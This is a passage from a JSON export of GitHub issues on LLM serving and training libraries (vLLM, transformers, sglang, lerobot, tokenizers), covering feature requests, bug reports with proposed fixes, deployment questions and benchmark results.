"### \ud83d\ude80 The feature, motivation and pitch\n\nThe current code contains some fake function definitions, which are placed together with the main logic, such as `all_reduce_fake`. 
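\n\nFor context, the pattern in question looks roughly like this (an illustrative sketch, not the exact vLLM code):\n\n```python\nimport torch\n\ndef all_reduce(tensor: torch.Tensor) -> torch.Tensor:\n    ...  # the real collective, with communication side effects\n\ndef all_reduce_fake(tensor: torch.Tensor) -> torch.Tensor:\n    # Shape/dtype-only stub registered as the fake (meta) implementation\n    # of the custom op, so torch.compile can trace the graph without\n    # actually running the collective.\n    return torch.empty_like(tensor)\n```\n\n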
In the `parallel_state.py` file, can we define a file called `parallel_state_fake.py`, move all the corresponding fake functions to that file, and do the same for the others?\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31469", "state": "open", "labels": [ "feature request" ], "created_at": "2025-12-29T03:14:26Z", "updated_at": "2025-12-29T06:16:08Z", "comments": 3, "user": "lengrongfu" }, { "repo": "vllm-project/vllm", "number": 31467, "title": "[RFC]: A Triton operator dispatch mechanism through modified `CustomOp`", "body": "### Motivation.\n\nTriton is becoming increasingly important in vLLM, and we've noticed its use in many models, quantization processes, and general workflows. Meanwhile, vLLM supports various backends. Typically, to achieve high performance, **different implementations of the Triton kernels** are used on different hardware, such as Ascend NPU. However, we've observed that vLLM currently lacks an effective operator dispatch mechanism for Triton to ensure that various backends can implement their own Triton kernels, which are then uniformly called by vLLM.\n\nThere are three ways of calling Triton functions now:\n\n#### Through Attention Backend\nTriton functions are called in the `Attention` layer when the attention backend is specified as `TRITON_ATTN` or `TRITON_MLA`.\n\n```python\ncurrent_platform.get_attn_backend_cls(...)\n```\n\n#### Through CustomOp\nSome Triton functions are included in other CustomOps' forward pipelines and are put into `forward_cuda`, e.g., `causal_conv1d_fn` and `causal_conv1d_update` in `ShortConv`.\n\n```python\nclass op1(CustomOp):\n    def forward_cuda(kwargs):\n        triton_fn(**kwargs)\n```\n\n#### Directly call\nAnd there are others that call Triton functions directly in the normal pipeline:\n - some models directly call Triton functions in forward\n   - Qwen3-Next\n   - Kimi-Linear\n   - ...\n - modelrunner v2\n   - block table\n   - input batch\n\nAlso, I notice that the implementations differ between ROCm and NVIDIA, although they are both CUDA-like platforms.\n\n```python\nif current_platform.is_rocm():\n\n    @triton.jit\n    def round_int8(x):\n        return tl.extra.hip.libdevice.round(x).to(tl.int8)\n\nelse:\n\n    @triton.jit\n    def round_int8(x):\n        return tl.extra.cuda.libdevice.round(x).to(tl.int8)\n```\n\n\n### Proposed Change.\n\nTo solve the issues above, we propose the following changes:\n\n\"Image\"\n\n1. Abstract a `CustomOpBase` class, which maintains the functions `register`, `register_oot` and `forward_dispatch`; this means every instance of `CustomOpBase` can be registered in or out of vLLM.\n2. Separate `CustomOp` and `CustomTritonOp`; we dispatch `CustomTritonOp` at the Python function level, paired with the Triton kernel, while `CustomOp` stays as is.\n3. Refactor the existing Triton kernels that are directly called without a Python function wrapping them, e.g., `eagle_prepare_inputs_padded_kernel`\n4. Refactor the Triton Python functions to inherit from `CustomTritonOp`, and optimize the current implementation of Triton kernel patching.\n\n#### Example\n\n##### Code Change\n\n```python\nclass CustomOpBase:\n    \"\"\"\n    Base class for custom op. 
This class mainly offers the registry and dispatch functions;\n    the others must be overwritten in subclasses.\n    Dispatches the forward method to the appropriate backend.\n    \"\"\"\n\n    op_registry: dict[str, Any] = {}\n    op_registry_oot: dict[str, Any] = {}\n\n    def __new__(cls, *args, **kwargs):\n        try:\n            op_name = cls.__name__\n        except AttributeError:\n            raise TypeError(\n                f\"Cannot instantiate '{cls.__name__}': its 'name' attribute \"\n                f\"was not set, possibly because it was not decorated with \"\n                f\"@CustomOp.register, or it's the CustomOp base class itself.\"\n            ) from None\n\n        if op_name not in cls.op_registry_oot:\n            op_cls_to_instantiate = cls\n        else:\n            op_cls_to_instantiate = cls.op_registry_oot[op_name]\n        logger.debug(\n            \"Instantiating custom op: %s using %s\",\n            op_name,\n            str(op_cls_to_instantiate),\n        )\n        return super().__new__(op_cls_to_instantiate)\n\n    def __init__(self, enforce_enable: bool = False):\n        self._enforce_enable = enforce_enable\n        self._forward_method = self.dispatch_forward()\n\n    def forward(self, *args, **kwargs):\n        return self._forward_method(*args, **kwargs)\n\n    def forward_native(self, *args, **kwargs):\n        raise NotImplementedError\n\n    def forward_cuda(self, *args, **kwargs):\n        raise NotImplementedError\n\n    def forward_x(self, *args, **kwargs):\n        raise NotImplementedError\n\n    def forward_oot(self, *args, **kwargs):\n        raise NotImplementedError\n\n    def dispatch_forward(self):\n        raise NotImplementedError\n\n    # Decorator to register custom ops.\n    @classmethod\n    def register(cls, name: str):\n        def decorator(op_cls):\n            assert name not in cls.op_registry, f\"Duplicate op name: {name}\"\n            op_cls.name = name\n            cls.op_registry[name] = op_cls\n            return op_cls\n\n        return decorator\n\n    @classmethod\n    def register_oot(cls, _decorated_op_cls=None, name: str | None = None):\n        def decorator(op_cls):\n            reg_name = name if name is not None else cls.__name__\n            assert reg_name not in cls.op_registry_oot, f\"Duplicate op name: {reg_", "url": "https://github.com/vllm-project/vllm/issues/31467", "state": "open", "labels": [ "RFC" ], "created_at": "2025-12-29T02:44:13Z", "updated_at": "2026-01-06T07:38:29Z", "comments": 12, "user": "MengqingCao" }, { "repo": "vllm-project/vllm", "number": 31437, "title": "[Bug]: Streaming tool calls missing id/type/name in finish chunk", "body": "### Your current environment\n\nvLLM 0.14.0rc1.dev3 (but also affects main branch as of today)\n\n### Model\n\nGLM-4.7-AWQ with `--tool-call-parser glm47` (also affects other parsers that emit complete tool calls)\n\n### What is the issue?\n\nWhen streaming tool calls, the finish chunk code in `serving_chat.py` overwrites the tool parser's properly-formatted `DeltaMessage` with a stripped-down version that only contains `index` and `function.arguments`, losing the `id`, `type`, and `function.name` fields.\n\nThis breaks OpenAI-compatible clients that expect `id` to be present in tool call responses.\n\n### Root cause\n\nIn `serving_chat.py` around line 1237, when `_should_check_for_unstreamed_tool_arg_tokens()` returns true:\n\n```python\nremaining_call = expected_call.replace(actual_call, \"\", 1)\ndelta_message = DeltaMessage(\n    tool_calls=[\n        DeltaToolCall(\n            index=index,\n            function=DeltaFunctionCall(\n                arguments=remaining_call\n            ).model_dump(exclude_none=True),\n        )\n    ]\n)\n```\n\nThis creates a new `DeltaMessage` without preserving `id`, `type`, or `function.name` from the original `delta_message` that the tool parser returned.\n\n### Proposed fix\n\nPreserve the fields from the original 
delta:\n\n```python\nremaining_call = expected_call.replace(actual_call, \"\", 1)\noriginal_tc = delta_message.tool_calls[0]\noriginal_fn = original_tc.function if original_tc else None\ndelta_message = DeltaMessage(\n    tool_calls=[\n        DeltaToolCall(\n            index=index,\n            id=original_tc.id if original_tc else None,\n            type=original_tc.type if original_tc else None,\n            function=DeltaFunctionCall(\n                name=original_fn.name if original_fn else None,\n                arguments=remaining_call,\n            ),\n        )\n    ]\n)\n```\n\n### Why this wasn't caught before\n\nThis code path only triggers when the tool parser hasn't streamed all argument tokens yet. Many parsers stream arguments incrementally, so they rarely hit this path. Parsers like GLM that emit complete tool calls at once trigger it consistently.\n\n### Related issues\n\n- #16340 (similar symptoms, different root cause)\n- #10781 (mentions delta not being submitted correctly)\n\nHappy to submit a PR if this approach looks right.\n\n### Before submitting a new issue...\n\n- [X] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31437", "state": "closed", "labels": [], "created_at": "2025-12-27T23:54:20Z", "updated_at": "2025-12-29T13:10:54Z", "comments": 0, "user": "amittell" }, { "repo": "vllm-project/vllm", "number": 31414, "title": "[Feature][Cleanup]: Unify `vllm.utils.flashinfer` and `vllm.model_executor.layers.quantization.utils.flashinfer_utils`", "body": "### \ud83d\ude80 The feature, motivation and pitch\n\nIt's confusing to have both.\n\n### Alternatives\n\n_No response_\n\n### Additional context\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31414", "state": "open", "labels": [ "help wanted", "good first issue", "feature request" ], "created_at": "2025-12-27T18:27:00Z", "updated_at": "2025-12-31T22:25:36Z", "comments": 4, "user": "robertgshaw2-redhat" }, { "repo": "vllm-project/vllm", "number": 31398, "title": "[Doc]: Eagle3 with tensor parallelism", "body": "### \ud83d\udcda The doc issue\n\nAccording to https://docs.vllm.ai/en/latest/features/spec_decode/#speculating-using-eagle-based-draft-models: \n\n> The EAGLE based draft models need to be run without tensor parallelism (i.e. draft_tensor_parallel_size is set to 1 in speculative_config), although it is possible to run the main model using tensor parallelism (see example above).\n\nBut there's no explanation for why the draft tp size can only be set to 1, so I checked the code and found:\n\nhttps://github.com/vllm-project/vllm/blob/52bf0665168c539d2d061a664ad62b18a12e80bb/vllm/config/speculative.py#L441-L447\n\nand\n\nhttps://github.com/vllm-project/vllm/blob/52bf0665168c539d2d061a664ad62b18a12e80bb/vllm/config/speculative.py#L563-L571\n\nI did not find any explicit restriction that enforces the draft model to run without tensor parallelism.\n\nSo I guess the `draft_tensor_parallel_size` should be set to **either** 1 **or** the same value as the target_model. 
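\n\nSomething along these lines (a minimal sketch with illustrative model names and sizes, not the exact command I benchmarked):\n\n```python\nfrom vllm import LLM\n\nllm = LLM(\n    model=\"meta-llama/Llama-3.1-8B-Instruct\",  # placeholder target model\n    tensor_parallel_size=4,\n    speculative_config={\n        \"method\": \"eagle3\",\n        \"model\": \"yuhuili/EAGLE3-LLaMA3.1-Instruct-8B\",  # placeholder draft\n        \"num_speculative_tokens\": 3,\n        \"draft_tensor_parallel_size\": 4,  # same as the target TP size\n    },\n)\n```\n\n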
I also tried doing so and found that tensor parallelism seems to work correctly.\n\nIs it possible that this functionality has already been implemented, but the documentation has not been updated accordingly?\n\n\n### Suggest a potential alternative/fix\n\nJust change one line of documentation as mentioned above:\n\n> It's possible to run the EAGLE based draft models with tensor parallelism using tp_size=1 or the target model's tp_size (i.e. `draft_tensor_parallel_size` is set to either 1 or the same value as the target_model in speculative_config).\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31398", "state": "open", "labels": [ "documentation" ], "created_at": "2025-12-27T03:10:50Z", "updated_at": "2026-01-04T01:21:07Z", "comments": 3, "user": "JSYRD" }, { "repo": "huggingface/transformers", "number": 43048, "title": "Need to understand difference between TP support via transformers code v/s Pytorch's native parallelize_module API.", "body": "Based on the existing code base of transformers, the following sequence of operations is performed on the model object to make it TP compatible.\n\n- TP Plan for Llama: https://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/models/llama/configuration_llama.py#L113\n- self._tp_plan is populated based on the above default plan:\nhttps://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/modeling_utils.py#L1325\n- from_pretrained calls distribute_model\nhttps://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/modeling_utils.py#L3944\n- distribute_model internally applies TP hooks based on the plans defined for each module.\nhttps://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/integrations/tensor_parallel.py#L1307 \n\n\nI want to understand how this differs from the parallelize_module API of PyTorch (https://docs.pytorch.org/docs/stable/distributed.tensor.parallel.html#torch.distributed.tensor.parallel.parallelize_module).\n\nOne example of TP+DP can be found at the link below.\nhttps://github.com/pytorch/pytorch/blob/7de041cb5a5817500b973eb32a70325187a83407/test/distributed/_composable/test_composability/test_2d_composability.py#L478\n\nFrom the PyTorch example, it looks very clean to work with plain DP and TP. 
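\n\nFor reference, a minimal sketch of that PyTorch-native style (the submodule paths are hypothetical; the API is `torch.distributed.tensor.parallel`):\n\n```python\nfrom torch.distributed.device_mesh import init_device_mesh\nfrom torch.distributed.tensor.parallel import (\n    ColwiseParallel,\n    RowwiseParallel,\n    parallelize_module,\n)\n\n# One-dimensional TP mesh over 8 GPUs.\ntp_mesh = init_device_mesh(\"cuda\", (8,), mesh_dim_names=(\"tp\",))\n\n# Plan keyed by (hypothetical) submodule paths inside the model.\nmodel = parallelize_module(\n    model,\n    tp_mesh,\n    {\n        \"mlp.gate_proj\": ColwiseParallel(),\n        \"mlp.down_proj\": RowwiseParallel(),\n    },\n)\n```\n\n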
But when using Transformers' Trainer along with Accelerate for plain DP+TP, there are a lot of complications, identified in https://github.com/huggingface/accelerate/issues/3876#issuecomment-3627324602.\n\nI would like to understand the difference between the existing transformers approach and the plain PyTorch approach, and request streamlining the implementation of transformers as well as accelerate if that feels suitable.", "url": "https://github.com/huggingface/transformers/issues/43048", "state": "open", "labels": [], "created_at": "2025-12-26T10:05:38Z", "updated_at": "2026-01-05T15:35:13Z", "comments": 1, "user": "quic-meetkuma" }, { "repo": "huggingface/lerobot", "number": 2721, "title": "The virtual machine is unable to recognize the keyboard.", "body": "### Ticket Type\n\n\u2753 Technical Question\n\n### Environment & System Info\n\n```Shell\n(base) tom@tom-VMware-Virtual-Platform:~/lerobot_alohamini$ python check_lerobot.py \nUsing existing DISPLAY: :0\n=== Environment diagnostics ===\nPython version: 3.12.12 | packaged by conda-forge | (main, Oct 22 2025, 23:25:55) [GCC 14.3.0]\nDISPLAY environment variable: :0\nXDG_SESSION_TYPE environment variable: wayland\nWayland_DISPLAY environment variable: not set\n===============\n\nStarting keyboard listener...\nPlease try pressing some letter keys and arrow keys.\nPress the `ESC` key to exit the test.\n\nListener thread started. Waiting for key input...\nwsdasdwsdasdfdaswdsdfawdsa\n```\n\n### Description\n\nWhen you use the Ubuntu system of the virtual machine to control the main arm and chassis, you may encounter a problem where the keyboard cannot be recognized. This problem is actually quite easy to solve. All you need to do is log out of your desktop, go to the login screen, and click the \u2699 gear icon below the username to select \"Ubuntu on Xorg\". The reason for this problem is that the pynput library relies on the X11 protocol, while Wayland is a new display server protocol, and the two are not fully compatible. After that, you can safely use your keyboard.\n\n### Context & Reproduction\n\n_No response_\n\n### Relevant logs or stack trace\n\n```Shell\n\n```\n\n### Checklist\n\n- [ ] I have searched existing tickets to ensure this isn't a duplicate.\n- [ ] I am using the latest version of the `main` branch.\n- [ ] I have verified this is not an environment-specific problem.\n\n### Additional Info / Workarounds\n\n_No response_", "url": "https://github.com/huggingface/lerobot/issues/2721", "state": "open", "labels": [ "question" ], "created_at": "2025-12-26T08:02:27Z", "updated_at": "2025-12-26T08:02:37Z", "user": "ht202" }, { "repo": "huggingface/transformers", "number": 43045, "title": "Multimodal chat sample", "body": "### Feature request\n\nAdd a sample covering a chat scenario including images, videos or audio.\n\n### Motivation\n\n`AutoModelForCausalLM`'s `use_cache` is barely documented.\nDescribe a pattern handling the following cases:\n1. The tokenizer replaces tokens that are already in the kv cache with a different token. For example, the model generated 2 tokens with string representations `a` and `b`, and the tokenizer replaces them with a single `a b` token on the next iteration, invalidating a part of the kv cache\n2. 
Reuse embeddings computed earlier for non-text modalities\n\nThere's https://github.com/huggingface/transformers/blob/a7f29523361b2cc12e51c1f5133d95f122f6f45c/src/transformers/cli/chat.py but it doesn't cover non-text modalities.\n\n### Your contribution\n\nI'm fine to submit a PR. That will help me to learn along the way. But I need guidance on how to resolve the issues I described in the motivation section.", "url": "https://github.com/huggingface/transformers/issues/43045", "state": "closed", "labels": [ "Feature request" ], "created_at": "2025-12-26T06:16:53Z", "updated_at": "2025-12-31T10:36:38Z", "comments": 9, "user": "Wovchena" }, { "repo": "sgl-project/sglang", "number": 15860, "title": "[Ask for help] How to deploy GLM-4.7", "body": "Hi, can anyone help me to deploy GLM-4.7? I encounter a bug when using `sglang==0.5.6.post2` (which is the latest on `https://github.com/sgl-project/sglang`). What is the correct version for GLM-4.7?\n```\nlaunch_server.py: error: argument --tool-call-parser: invalid choice: 'glm47' (choose from 'deepseekv3', 'deepseekv31', 'deepseekv32', 'glm', 'glm45', 'gpt-oss', 'kimi_k2', 'llama3', 'mistral', 'pythonic', 'qwen', 'qwen25', 'qwen3_coder', 'step3', 'minimax-m2')\n```\n\nThanks so much!!!!!!!!!!!\n\n\"Image\"", "url": "https://github.com/sgl-project/sglang/issues/15860", "state": "open", "labels": [], "created_at": "2025-12-26T02:59:06Z", "updated_at": "2025-12-28T21:21:17Z", "comments": 2, "user": "sunjie279" }, { "repo": "huggingface/tokenizers", "number": 1919, "title": "De/tokenization on CUDA", "body": "Could at least de-tokenization be done directly on CUDA? Like in my hack `bpedecode_vec` in https://github.com/pytorch/pytorch/issues/135704#issue-2520180382, which indexes into a detokenization vocab byte table via `repeat_interleave`.\n\nAlso, maybe for better CUDAGraph-ability / no CPU syncs, there should be some static-sized pre-allocated `out=` version, like `torch.nonzero_static`?\n\n---\nOff-topic: it's also a bit inconsistent naming to have `batch_decode` and `batch_encode_plus`... What is the motivation for the `_plus` suffix?", "url": "https://github.com/huggingface/tokenizers/issues/1919", "state": "open", "labels": [], "created_at": "2025-12-26T02:20:49Z", "updated_at": "2026-01-05T10:51:17Z", "comments": 1, "user": "vadimkantorov" }, { "repo": "vllm-project/vllm", "number": 31361, "title": "[Usage]: Question about the dummy run. It seems the dummy run uses different precision?", "body": "### Question\n\nI am trying to modify vLLM, especially the **tp** communication: I'm trying to **break all-reduce into reduce-scatter + all-gather**. \n\nHowever, I encountered a precision problem. After I printed the hidden states, it seems each layer has around a +-0.01 diff; when it accumulates over all the layers, the result becomes a huge difference. I thought it might be my implementation error. But after I checked the log, I saw some dummy runs before executing the real request. **I checked the dummy run's data. It perfectly matches between all-reduce & reduce-scatter + all-gather**, which means each layer is exactly the same with no accumulated error. So I wonder: \n1. Can you tell me where the two dummy runs come from? In my example with Qwen3-32B, one seqlen is the max model len and one seqlen is 1024.\n2. 
Can you possibly tell me what may influence the precision?\n\n\n### How would you like to use vllm\n\n_No response_\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/31361", "state": "closed", "labels": [ "usage" ], "created_at": "2025-12-25T16:38:03Z", "updated_at": "2025-12-27T03:41:27Z", "comments": 0, "user": "Dingjifeng" }, { "repo": "vllm-project/vllm", "number": 31353, "title": "[Bug]: KV Cache grows continuously with just one chat completion request using meta-llama/Llama-3.2-1B on L40 GPU with Flash Attention, and the request finally completed after 10 minutes", "body": "### Your current environment\n\n
\nThe output of python collect_env.py\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 24.04.3 LTS (x86_64)\nGCC version : (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0\nClang version : Could not collect\nCMake version : version 3.28.3\nLibc version : glibc-2.39\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.9.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by Anaconda, Inc. | (main, Jun 5 2025, 13:09:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-5.15.0-161-generic-x86_64-with-glibc2.39\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 12.6.85\nCUDA_MODULE_LOADING set to : \nGPU models and configuration : GPU 0: NVIDIA L40S\nNvidia driver version : 550.163.01\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_adv.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_precompiled.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_engines_runtime_compiled.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_graph.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_heuristic.so.9.5.1\n/usr/lib/x86_64-linux-gnu/libcudnn_ops.so.9.5.1\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 46 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 16\nOn-line CPU(s) list: 0-15\nVendor ID: GenuineIntel\nModel name: Intel(R) Xeon(R) Gold 6338 CPU @ 2.00GHz\nCPU family: 6\nModel: 106\nThread(s) per core: 2\nCore(s) per socket: 8\nSocket(s): 1\nStepping: 6\nBogoMIPS: 3990.65\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts mmx fxsr sse sse2 ss ht syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid tsc_known_freq pni pclmulqdq dtes64 ssse3 fma cx16 pdcm pcid sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand hypervisor lahf_lm abm 3dnowprefetch cpuid_fault invpcid_single ssbd ibrs ibpb stibp ibrs_enhanced fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves wbnoinvd arat avx512vbmi umip pku ospke avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg avx512_vpopcntdq la57 rdpid fsrm md_clear arch_capabilities\nHypervisor vendor: KVM\nVirtualization type: full\nL1d cache: 512 KiB (16 instances)\nL1i cache: 512 KiB (16 instances)\nL2 cache: 32 MiB (8 instances)\nL3 cache: 16 MiB (1 instance)\nNUMA node(s): 1\nNUMA node0 CPU(s): 0-15\nVulnerability Gather data sampling: Unknown: Dependent on hypervisor status\nVulnerability Indirect target selection: Mitigation; Aligned branch/return thunks\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Mmio stale data: Vulnerable: Clear CPU buffers attempted, no microcode; SMT Host state unknown\nVulnerability Reg 
file data sampling: Not affected\nVulnerability Retbleed: Not affected\nVulnerability Spec rstack overflow: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced / Automatic IBRS; IBPB conditional;", "url": "https://github.com/vllm-project/vllm/issues/31353", "state": "open", "labels": [ "bug", "help wanted" ], "created_at": "2025-12-25T13:56:52Z", "updated_at": "2025-12-27T15:55:34Z", "comments": 1, "user": "aravilli" }, { "repo": "sgl-project/sglang", "number": 15825, "title": "Is it normal that Qwen3-30B-A3B runs slower than Qwen3-8B?", "body": "I serve two models on the Ascend 910 platform (following sglang's ascend examples) with the same tp2dp8 and benchmarked them. \nBefore testing, I suppose A3B will be faster than 8B for fewer activated tensor blocks. \nBut the result is different:\n### qwen 30B A3B\n```\nexport SGLANG_SET_CPU_AFFINITY=1\nexport PYTORCH_NPU_ALLOC_CONF=expandable_segments:True\nexport STREAMS_PER_DEVICE=32\nexport HCCL_BUFFSIZE=1536\nexport HCCL_OP_EXPANSION_MODE=AIV\nexport SGLANG_DEEPEP_NUM_MAX_DISPATCH_TOKENS_PER_RANK=32\nexport SGLANG_DEEPEP_BF16_DISPATCH=1\nexport ENABLE_ASCEND_MOE_NZ=1\n\npython -m sglang.launch_server \\\n --device npu \\\n --attention-backend ascend \\\n --trust-remote-code \\\n --tp-size 2 \\\n --dp-size 8 \\\n --model **Qwen/Qwen3-30B-A3B-Instruct-2507** \\\n --model-path /models/Qwen3-30B-A3B-Instruct-2507 \\\n --port 30111 \\\n --mem-fraction-static 0.8\n```\n```\n============ Serving Benchmark Result ============\nBackend: sglang \nTraffic request rate: inf \nMax request concurrency: not set \nSuccessful requests: 1000 \nBenchmark duration (s): 69.68 \nTotal input tokens: 3055233 \nTotal input text tokens: 3055233 \nTotal input vision tokens: 0 \nTotal generated tokens: 513413 \nTotal generated tokens (retokenized): 512578 \nRequest throughput (req/s): 14.35 \nInput token throughput (tok/s): 43846.56 \n**Output token throughput (tok/s): 7368.14** \nPeak output token throughput (tok/s): 12775.00 \nPeak concurrent requests: 1000 \nTotal token throughput (tok/s): 51214.70 \nConcurrency: 665.97 \n----------------End-to-End Latency----------------\nMean E2E Latency (ms): 46404.83 \nMedian E2E Latency (ms): 49605.93 \n---------------Time to First Token----------------\nMean TTFT (ms): 10682.85 \nMedian TTFT (ms): 9808.31 \nP99 TTFT (ms): 16320.45 \n-----Time per Output Token (excl. 
1st token)------\nMean TPOT (ms): 96.14 \nMedian TPOT (ms): 75.08 \nP99 TPOT (ms): 399.24 \n---------------Inter-Token Latency----------------\nMean ITL (ms): 69.71 \nMedian ITL (ms): 69.43 \nP95 ITL (ms): 80.73 \nP99 ITL (ms): 96.53 \nMax ITL (ms): 5450.67 \n==================================================\n```\n\n### Qwen3 8B\n\n```\nexport SGLANG_SET_CPU_AFFINITY=1\nexport PYTORCH_NPU_ALLOC_CONF=expandable_segments:True\nexport STREAMS_PER_DEVICE=32\nexport HCCL_BUFFSIZE=1536\nexport HCCL_OP_EXPANSION_MODE=AIV\n\nASCEND_RT_VISIBLE_DEVICES=0 python -m sglang.launch_server \\\n --device npu \\\n --attention-backend ascend \\\n --trust-remote-code \\\n --model Qwen/Qwen3-8B \\\n --model-path /models/Qwen3-8B \\\n --port 30111 \\\n --mem-fraction-static 0.8 \\\n --tp-size 2 \\\n --dp-size 8 \n```\n```\n============ Serving Benchmark Result ============\nBackend: sglang \nTraffic request rate: inf \nMax request concurrency: not set \nSuccessful requests: 1000 \nBenchmark duration (s): 49.67 \nTotal input tokens: 3055233 \nTotal input text tokens: 3055233 \nTotal input vision tokens: 0 \nTotal generated tokens: 513413 \nTotal generated tokens (retokenized): 512976 \nRequest throughput (req/s): 20.13 \nInput token throughput (tok/s): 61513.14 \n**Output token throughput (tok/s): 10336.90** \nPeak output token throughput (tok/s): 23242.00 \nPeak concurrent requests: 1000 \nTotal token throughput (tok/s): 71850.04 \nConcurrency: 709.69 \n----------------End-to-End Latency----------------\nMean E2E Latency (ms): 35249.04 \nMedian E2E Latency (ms): 36490.95 \n---------------Time to First Token----------------\nMean TTFT (ms): 10977.22 \nMedian TTFT (ms): 9339.57 \nP99 TTFT (ms): 16697.36 \n-----Time per Output Token (excl. 1st token)------\nMean TPOT (ms): 82.35 \nMedian TPOT (ms): 48.71 \nP99 TPOT (ms): 516.74 \n---------------Inter-Token Latency----------------\nMean ITL (ms): 47.37 \nMedian ITL (ms): 35.12 \nP95 ITL (ms): 105.74 \nP99 ITL (ms): 463.46 \nMax I", "url": "https://github.com/sgl-project/sglang/issues/15825", "state": "open", "labels": [], "created_at": "2025-12-25T11:26:10Z", "updated_at": "2025-12-25T11:26:10Z", "comments": 0, "user": "yucc-leon" }, { "repo": "vllm-project/vllm", "number": 31344, "title": "[Usage]: how to pass param logits_processors in AsyncEngineArgs?", "body": "### Your current environment\n import torch\nfrom transformers import LogitsProcessor\nfrom transformers.generation.logits_process import _calc_banned_ngram_tokens\nfrom typing import List, Set\n\n\nclass NoRepeatNGramLogitsProcessor(LogitsProcessor):\n\n def __init__(self, ngram_size: int, window_size: int = 100, whitelist_token_ids: set = None):\n if not isinstance(ngram_size, int) or ngram_size <= 0:\n raise ValueError(f\"`ngram_size` has to be a strictly positive integer, but is {ngram_size}\")\n if not isinstance(window_size, int) or window_size <= 0:\n raise ValueError(f\"`window_size` has to be a strictly positive integer, but is {window_size}\")\n self.ngram_size = ngram_size\n self.window_size = window_size\n self.whitelist_token_ids = whitelist_token_ids or set()\n \n def __call__(self, input_ids: List[int], scores: torch.FloatTensor) -> torch.FloatTensor:\n if len(input_ids) < self.ngram_size:\n return scores\n \n current_prefix = tuple(input_ids[-(self.ngram_size - 1):])\n \n search_start = max(0, len(input_ids) - self.window_size)\n search_end = len(input_ids) - self.ngram_size + 1\n \n banned_tokens = set()\n for i in range(search_start, search_end):\n ngram = tuple(input_ids[i:i + 
